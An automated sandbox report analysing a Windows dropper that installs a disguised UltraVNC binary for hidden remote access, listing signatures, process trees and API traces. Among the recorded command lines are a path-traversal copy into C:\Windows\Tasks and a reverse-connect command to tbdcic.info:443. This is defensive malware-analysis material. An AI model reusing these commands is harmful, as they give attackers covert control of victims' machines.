Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mSRW5AfJpC.exe

Overview

General Information

Sample name:mSRW5AfJpC.exe
renamed because original name is a hash value
Original sample name:41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c.exe
Analysis ID:1579875
MD5:95bb89ebdcec89e123e5647555d63aed
SHA1:e7aa5b272cb301dfda33956a37aa9506d176e6ce
SHA256:41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • mSRW5AfJpC.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\mSRW5AfJpC.exe" MD5: 95BB89EBDCEC89E123E5647555D63AED)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5968 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6572 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5600 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 3620 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 6084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 5948 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 412 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 1900 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7596 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7864 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 7968 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7976 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 8104 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 8112 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8172 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7960 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7996 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6408 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7588 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\Fgyxfc.Qnwi4IJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Windows\Tasks\sync_browser.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4IJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
        SourceRuleDescriptionAuthorStrings
        00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 9 entries
                  SourceRuleDescriptionAuthorStrings
                  19.0.sync_browser.exe.7ff740000000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    19.2.sync_browser.exe.7ff740000000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      23.0.sync_browser.exe.7ff740000000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        23.2.sync_browser.exe.7ff740000000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7968, ProcessName: sync_browser.exe
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6572, TargetFilename: C:\Windows\Tasks\conhost.exe
                          Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, ProcessId: 8104, ProcessName: sync_browser.exe
                          Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mSRW5AfJpC.exe", ParentImage: C:\Users\user\Desktop\mSRW5AfJpC.exe, ParentProcessId: 1516, ParentProcessName: mSRW5AfJpC.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 1784, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mSRW5AfJpC.exe", ParentImage: C:\Users\user\Desktop\mSRW5AfJpC.exe, ParentProcessId: 1516, ParentProcessName: mSRW5AfJpC.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 1784, ProcessName: cmd.exe
                          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7968, ProcessName: sync_browser.exe
                          No Suricata rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                          Source: mSRW5AfJpC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: conhost.pdbUGP source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
                          Source: Binary string: conhost.pdb source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,19_2_00007FF74002C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,19_2_00007FF7400BA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,19_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,19_2_00007FF740005910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF74002C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF7400BA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF740005910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,19_2_00007FF740026DD1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000BB70 recv,19_2_00007FF74000BB70
                          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                          Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://forum.uvnc.com
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://www.uvnc.com
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                          Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.drString found in binary or memory: http://x1.i.lencr.org/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740001AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,19_2_00007FF740001AE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400313A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00007FF7400313A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740001DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,19_2_00007FF740001DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400313A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF7400313A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740001DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF740001DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740001AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,19_2_00007FF740001AE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002F980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect,19_2_00007FF74002F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400231B0 GetKeyboardState,19_2_00007FF7400231B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,19_2_00007FF7400174C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF7400174C0
